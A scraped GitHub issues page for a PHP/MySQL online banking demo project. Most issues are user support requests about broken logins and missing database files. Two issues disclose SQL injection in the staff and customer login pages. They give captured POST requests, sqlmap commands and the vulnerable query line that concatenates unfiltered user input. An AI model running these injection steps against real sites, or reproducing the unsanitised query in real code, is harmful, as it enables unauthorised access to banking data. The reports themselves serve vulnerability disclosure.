g33kyrash / online-banking-system Goto Github PK
View Code? Open in Web Editor NEWOnline Banking System in PHP & MySQL
Online Banking System in PHP & MySQL
First visit http://ip:port/staff_login.php
Enter any user and password,Use burp to capture packets
Modify the data package as follows, save as data.txt:
POST /staff_login.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://localhost:8888
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
uname=*&pwd=admin&submitBtn=Log+In
execute SQLmap
python sqlmap.py -r data.txt --batch --current-user
file staff_login.php line 43
$username=$_REQUEST['uname'];
$password=$_REQUEST['pwd'];
$sql="SELECT email,pwd FROM staff WHERE email='$username' AND pwd='$password'";
without any filter for username and password
First visit http://IP:port/index.php
Enter any user and password,Use burp to capture packets
Modify the data package as follows, save as data.txt:
POST /index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://127.0.0.1/index.php
Cookie: PHPSESSID=r8l3df9nrcqh7aluf2m9lb6ah0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
uname=*&pwd=dddddddd&submitBtn=Log+In
execute SQLmap
sqlmap -r data.txt --batch
how about including balances?
like current amount in account.
This is the error message i receive when trying to login is this suppose to happen? please help
Fatal error: Uncaught Error: Call to undefined function mysql_connect() in C:\xampp\htdocs\banking_inc\dbconn.php:6 Stack trace: #0 C:\xampp\htdocs\banking\index.php(15): include() #1 {main} thrown in C:\xampp\htdocs\banking_inc\dbconn.php on line 6
there is no responce for login button for customer and staff please fix it
Hi,
After full configuration as instructed, the admin login is not happening as it was supposed to. I even changed the password from admin to admin123.
I have checked the database and its configuration in the _inc folder, and the same is uploaded in the server as latest configuration file.
This is the same case with customer login too. When I login using the customer credentials, the page redirects and the page is blank. On the admin page, the page doesn't react after entering the username and password, no redirect, nothing.
Any help in this regard? I will recheck the db, but i feel its the code, not the db!
Thanks in advance
I installed this on a hosting server thought cpanel, doesn't seem to be working right. i can't login to any accounts or admin
i need a db file to upload to php my admin
Dedicated to Sir. Mawe Olumuyiwa Awe
My Honorable
Kindly let me know where the DB file is...
Hello
When you click on the link to see the screenshots and description, it leads to a shady website with porn on it. It does not contain any screenshots or a description.
I tried to login to admin using admin/admin and it's telling me admin_homepage cannot be found?
Also what are the usernames of the preexisting users and i cannot see that in the database.
Thanks
please can you guide me on this script, i cannot add beneficiary what is the problem???
Hey,
Sorry for opening an issue but I found no other way to contact you.
I'd like to use the system for a micronational bank.
You can read about micronationalism over here: micronations.wiki
I promise not to use it for any illegal purposes and/or in any illegal way.
If you'd like me to present details as a guarantee, leave your mail and I will.
Thanks in advance,
elBandoler.
need some help ~
After visiting the admin login page, i don't know the username and pass to login with
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.